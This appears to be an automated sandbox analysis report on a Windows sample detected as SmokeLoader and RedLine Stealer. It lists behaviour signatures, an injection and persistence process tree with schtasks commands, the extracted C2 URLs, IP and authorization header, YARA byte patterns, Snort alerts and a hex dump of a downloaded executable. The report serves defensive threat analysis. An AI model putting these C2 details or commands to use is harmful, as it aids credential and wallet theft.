Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:	file.exe
Analysis ID:	1350471
MD5:	d05323747875e19243c7b15791bcaa1e
SHA1:	ef868fa846b3ffadfe311e91714c61e460d1be35
SHA256:	37f806898c3a9cad02a28645644f22e22b761e72a82758881b495691dd4d0097
Tags:	exeSmokeLoader
Infos:

Detection

RedLine, SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected RedLine Stealer

Yara detected SmokeLoader

System process connects to network (likely due to code injection or exploit)

Detected unpacking (changes PE section rights)

Antivirus detection for URL or domain

Antivirus detection for dropped file

Snort IDS alert for network traffic

Found malware configuration

Multi AV Scanner detection for submitted file

Benign windows process drops PE files

Malicious sample detected (through community Yara rule)

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Tries to steal Mail credentials (via file / registry access)

Maps a DLL or memory area into another process

Tries to detect sandboxes and other dynamic analysis tools (window names)

Query firmware table information (likely to detect VMs)

Connects to many ports of the same IP (likely port scanning)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Binary is likely a compiled AutoIt script file

Machine Learning detection for sample

Allocates memory in foreign processes

Injects a PE file into a foreign processes

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

.NET source code contains very large array initializations

Contains functionality to inject code into remote processes

Deletes itself after installation

Creates a thread in another existing process (thread injection)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Found many strings related to Crypto-Wallets (likely being stolen)

Uses schtasks.exe or at.exe to add and modify task schedules

Checks if the current machine is a virtual machine (disk enumeration)

Drops PE files with benign system names

Tries to harvest and steal browser information (history, passwords, etc)

PE file contains section with special chars

Hides threads from debuggers

Writes to foreign memory regions

Tries to steal Crypto Currency Wallets

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to detect sandboxes / dynamic malware analysis system (file name check)

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Injects code into the Windows Explorer (explorer.exe)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Tries to resolve many domain names, but no domain seems valid

Drops PE files to the application program directory (C:\ProgramData)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Downloads executable code via HTTP

Contains long sleeps (>= 3 min)

Abnormal high CPU Usage

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops files with a non-matching file extension (content does not match file extension)

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Binary contains a suspicious time stamp

Registers a DLL

Dropped file seen in connection with other malware

Creates a process in suspended mode (likely to inject code)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Contains functionality to call native functions

Found dropped PE file which has not been started or loaded

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Connects to many different domains

Entry point lies outside standard sections

AV process strings found (often used to terminate AV products)

Found inlined nop instructions (likely shell or obfuscated code)

Sample file is different than original file name gathered from version info

Detected TCP or UDP traffic on non-standard ports

Connects to several IPs in different countries

Contains capabilities to detect virtual machines

Uses SMTP (mail sending)

Uses FTP

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

file.exe (PID: 6024 cmdline: C:\Users\user\Desktop\file.exe MD5: D05323747875E19243C7B15791BCAA1E)

explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

38B4.exe (PID: 5316 cmdline: C:\Users\user\AppData\Local\Temp\38B4.exe MD5: D4E64AB0FF97F98EE52336A12F8A866B)

CL_Debug_Log.txt (PID: 4336 cmdline: C:\Users\user\AppData\Local\Temp\CL_Debug_Log.txt e -p"JDQJndnqwdnqw2139dn21n3b312idDQDB" "C:\Users\user\AppData\Local\Temp\CR_Debug_Log.txt" -o"C:\Users\user\AppData\Local\Temp\" MD5: 43141E85E7C36E31B52B22AB94D5E574)

conhost.exe (PID: 5020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 4448 cmdline: C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\user\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 2180 cmdline: schtasks.exe /Create /XML "C:\Users\user\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck" MD5: 48C2FE20575769DE916F48EF0676A965)

41CD.exe (PID: 2416 cmdline: C:\Users\user\AppData\Local\Temp\41CD.exe MD5: 1213B099D1578505C431AD2BE2137F96)

conhost.exe (PID: 348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

AppLaunch.exe (PID: 4088 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 89D41E1CF478A3D3C2C701A27A5692B2)

4A1B.exe (PID: 6948 cmdline: C:\Users\user\AppData\Local\Temp\4A1B.exe MD5: FBCBD8CF00AE50409FBB729F3303A84C)

50E3.exe (PID: 6308 cmdline: C:\Users\user\AppData\Local\Temp\50E3.exe MD5: 1457EF90EFDE49A7EE83080CE051D6F7)

50E3.exe (PID: 5000 cmdline: C:\Users\user\AppData\Local\Temp\50E3.exe MD5: 1457EF90EFDE49A7EE83080CE051D6F7)

regsvr32.exe (PID: 6596 cmdline: regsvr32 /s C:\Users\user\AppData\Local\Temp\57C9.dll MD5: B0C2FA35D14A9FAD919E99D9D75E1B9E)

regsvr32.exe (PID: 6736 cmdline: /s C:\Users\user\AppData\Local\Temp\57C9.dll MD5: 878E47C8656E53AE8A8A21E927C6F7E0)

8042.exe (PID: 848 cmdline: C:\Users\user\AppData\Local\Temp\8042.exe MD5: F7B08E0D5053C01E5792AB9B8DCB1F11)

explorer.exe (PID: 1340 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)

explorer.exe (PID: 888 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)

csrss.exe (PID: 348 cmdline: "C:\ProgramData\Drivers\csrss.exe" MD5: 1457EF90EFDE49A7EE83080CE051D6F7)

csrss.exe (PID: 1308 cmdline: "C:\ProgramData\Drivers\csrss.exe" MD5: 1457EF90EFDE49A7EE83080CE051D6F7)

csrss.exe (PID: 648 cmdline: "C:\ProgramData\Drivers\csrss.exe" MD5: 1457EF90EFDE49A7EE83080CE051D6F7)

csrss.exe (PID: 2912 cmdline: "C:\ProgramData\Drivers\csrss.exe" MD5: 1457EF90EFDE49A7EE83080CE051D6F7)

vahvrsu (PID: 5980 cmdline: C:\Users\user\AppData\Roaming\vahvrsu MD5: D05323747875E19243C7B15791BCAA1E)

vahvrsu (PID: 3344 cmdline: C:\Users\user\AppData\Roaming\vahvrsu MD5: D05323747875E19243C7B15791BCAA1E)

Helper.exe (PID: 792 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Helper.exe C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck MD5: D1580EB52E6B28ACFB6CF06AACD95C98)

tdhvrsu (PID: 1620 cmdline: C:\Users\user\AppData\Roaming\tdhvrsu MD5: F7B08E0D5053C01E5792AB9B8DCB1F11)

Helper.exe (PID: 6704 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck MD5: D1580EB52E6B28ACFB6CF06AACD95C98)

Helper.exe (PID: 6756 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck MD5: D1580EB52E6B28ACFB6CF06AACD95C98)

Helper.exe (PID: 30864 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck MD5: D1580EB52E6B28ACFB6CF06AACD95C98)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/ https://bartblaze.blogspot.com/2021/06/digital-artists-targeted-in-redline.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://go-piratia.ru/tmp/index.php", "http://humydrole.com/tmp/index.php", "http://trunk-co.ru/tmp/index.php", "http://weareelight.com/tmp/index.php", "http://pirateking.online/tmp/index.php", "http://piratia.pw/tmp/index.php"]}

Threatname: RedLine

{"C2 url": "194.49.94.77:16339", "Bot Id": "1129", "Authorization Header": "42c32496d13dad47a88d2602711f6385"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.2104229521.0000000002B30000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000011.00000002.2425699854.0000000004700000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000011.00000002.2425699854.0000000004700000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x674:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.1805559161.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1805559161.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x6e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.1805874215.0000000004831000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1805874215.0000000004831000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x2e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000005.00000002.2105509155.0000000004631000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000005.00000002.2105509155.0000000004631000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x2e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000005.00000002.2105121877.0000000002BA0000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x7593:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.2391907349.00000000036FA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000011.00000002.2424970399.0000000002C40000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000019.00000002.2450588768.0000000002C00000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000A.00000002.2391907349.0000000003661000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000009.00000002.2373403403.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000011.00000002.2425830619.0000000004721000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000011.00000002.2425830619.0000000004721000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x274:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000B.00000002.2285416255.000000000288F000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000009.00000002.2381658030.0000000006A4C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1737285169.0000000002AF0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000011.00000002.2425309073.0000000002C70000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x73f2:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000014.00000003.2439565285.0000000002C30000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.2381658030.000000000668A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000009.00000002.2381658030.00000000065F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000002.1805728659.0000000002C61000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x758b:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000005.00000002.2104350043.0000000002B40000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000005.00000002.2104350043.0000000002B40000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x6e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000011.00000003.2369465159.0000000004700000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1805537161.0000000002AE0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000005.00000003.2048461979.0000000002B40000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
Process Memory Space: AppLaunch.exe PID: 4088	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: AppLaunch.exe PID: 4088	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: 4A1B.exe PID: 6948	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 4A1B.exe PID: 6948	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Click to see the 32 entries

Unpacked PEs

Source	Rule	Description	Author
0.3.file.exe.2af0000.0.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
20.3.vahvrsu.2c30000.0.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
5.2.vahvrsu.2b30e67.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0.2.file.exe.2ae0e67.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
5.3.vahvrsu.2b40000.0.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
9.2.AppLaunch.exe.400000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
17.3.8042.exe.4700000.0.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
0.2.file.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
7.2.41CD.exe.16c000.1.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
17.2.8042.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
5.2.vahvrsu.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
7.2.41CD.exe.140000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
17.2.8042.exe.2c40e67.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
7.2.41CD.exe.16c000.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
10.2.4A1B.exe.890000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Click to see the 10 entries

Snort Signatures

ET TROJAN Redline Stealer Family Activity (Response) - Source IP: 95.214.26.17 - Destination IP: 192.168.2.4

Timestamp:	95.214.26.17192.168.2.424714497392046056 11/30/23-11:19:52.744718
SID:	2046056
Source Port:	24714
Destination Port:	49739
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Possible Virut DGA NXDOMAIN Responses (com) - Source IP: 1.1.1.1 - Destination IP: 192.168.2.4

Timestamp:	1.1.1.1192.168.2.453598812811577 11/30/23-11:23:24.137182
SID:	2811577
Source Port:	53
Destination Port:	59881
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Redline Stealer Family Activity (Response) - Source IP: 194.49.94.77 - Destination IP: 192.168.2.4

Timestamp:	194.49.94.77192.168.2.416339497412046056 11/30/23-11:19:54.612431
SID:	2046056
Source Port:	16339
Destination Port:	49741
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC - Id1Response - Source IP: 194.49.94.77 - Destination IP: 192.168.2.4

Timestamp:	194.49.94.77192.168.2.416339497412043234 11/30/23-11:19:49.360128
SID:	2043234
Source Port:	16339
Destination Port:	49741
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Redline Stealer TCP CnC Activity - Source IP: 192.168.2.4 - Destination IP: 95.214.26.17

Timestamp:	192.168.2.495.214.26.1749739247142043231 11/30/23-11:20:05.736752
SID:	2043231
Source Port:	49739
Destination Port:	24714
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Possible Virut DGA NXDOMAIN Responses (com) - Source IP: 1.1.1.1 - Destination IP: 192.168.2.4

Timestamp:	1.1.1.1192.168.2.453610422811577 11/30/23-11:22:36.324315
SID:	2811577
Source Port:	53
Destination Port:	61042
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst - Source IP: 34.94.245.237 - Destination IP: 192.168.2.4

Timestamp:	34.94.245.237192.168.2.480497342037771 11/30/23-11:19:29.309088
SID:	2037771
Source Port:	80
Destination Port:	49734
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst - Source IP: 34.143.166.163 - Destination IP: 192.168.2.4

Timestamp:	34.143.166.163192.168.2.480497362037771 11/30/23-11:19:32.806872
SID:	2037771
Source Port:	80
Destination Port:	49736
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) - Source IP: 192.168.2.4 - Destination IP: 95.214.26.17

Timestamp:	192.168.2.495.214.26.1749739247142046045 11/30/23-11:19:47.260146
SID:	2046045
Source Port:	49739
Destination Port:	24714
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Redline Stealer TCP CnC Activity - Source IP: 192.168.2.4 - Destination IP: 194.49.94.77

Timestamp:	192.168.2.4194.49.94.7749741163392043231 11/30/23-11:20:06.842767
SID:	2043231
Source Port:	49741
Destination Port:	16339
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization) - Source IP: 192.168.2.4 - Destination IP: 194.49.94.77

Timestamp:	192.168.2.4194.49.94.7749741163392046045 11/30/23-11:19:49.168119
SID:	2046045
Source Port:	49741
Destination Port:	16339
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst - Source IP: 104.198.2.251 - Destination IP: 192.168.2.4

Timestamp:	104.198.2.251192.168.2.480497352037771 11/30/23-11:19:30.322875
SID:	2037771
Source Port:	80
Destination Port:	49735
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Redline Stealer TCP CnC - Id1Response - Source IP: 95.214.26.17 - Destination IP: 192.168.2.4

Timestamp:	95.214.26.17192.168.2.424714497392043234 11/30/23-11:19:47.447241
SID:	2043234
Source Port:	24714
Destination Port:	49739
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.24.0Date: Thu, 30 Nov 2023 10:19:55 GMTContent-Type: application/octet-streamConnection: closeContent-Description: File TransferContent-Disposition: attachment; filename=37ee76c1.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 17 04 66 63 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 8c 02 00 00 92 69 02 00 00 00 00 42 37 00 00 00 10 00 00 00 a0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 f0 6b 02 00 04 00 00 2e 3e 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 8f 02 00 78 00 00 00 00 00 6a 02 80 e3 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 11 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 27 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 b8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 2c 8a 02 00 00 10 00 00 00 8c 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 7c 55 67 02 00 a0 02 00 00 18 00 00 00 90 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 80 e3 01 00 00 00 6a 02 00 e4 01 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: hna.beAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: 96l.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: 6ail.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: ia.euAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: san.eeAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
